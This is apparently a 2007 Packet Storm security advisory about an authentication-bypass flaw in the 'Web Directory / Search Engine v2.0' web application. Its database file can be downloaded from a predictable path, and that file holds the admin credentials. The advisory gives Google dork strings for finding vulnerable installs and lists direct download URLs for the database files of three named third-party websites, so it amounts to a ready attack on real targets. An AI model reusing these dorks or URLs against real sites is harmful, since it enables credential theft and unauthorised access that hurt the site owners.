wdse20-db.txt

2007-05-30T00:00:00
ID PACKETSTORM:56955
Type packetstorm
Reporter Titanichacker
Modified 2007-05-30T00:00:00

Description

                                        
                                            `--/ INTRODUCTION --  
  
  
*  
*  
* Advisory : Web Directory / Search Engine v2.0 Authentication   
Bypass/Database Download Vulnerability  
* Release Date : 25 / 05 / 2007  
* Application : Web Directory / Search Engine v2.0  
* Impact : Remote  
* Googledork : "Web Directory / Search Engine v2.0" ,  
* or"allinurl:TD_SourcesTblsrch.asp"  
* Author : Titanichacker(egy-virus)  
* Contact : the-modest-pirate@hotmail.com  
* Home page : http://Hack-Teach.org  
*  
*  
  
  
--/ REPRODUCE --  
  
# Attackers Can Authentication Bypass In This Product By Add The Following   
Files:  
('/Database.mdb') And Download The Database Which Contains Table Named   
[admin]  
The admin Name And Password Inside  
  
Examples :  
# http://www.salesfly.com/member2/webdirectory/Database.mdb  
# http://www.shubhshagun.com/directory/Database.mdb  
# http://www.celtichosting.com/webdirectory/Database.mdb  
  
thanx  
  
cold-zero & mohandko & tryag team & hack-teach  
  
# www.Hack-Teach.com & mohandko.com & tryag.com  
  
_________________________________________________________________  
Express yourself instantly with MSN Messenger! Download today it's FREE!   
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/  
  
`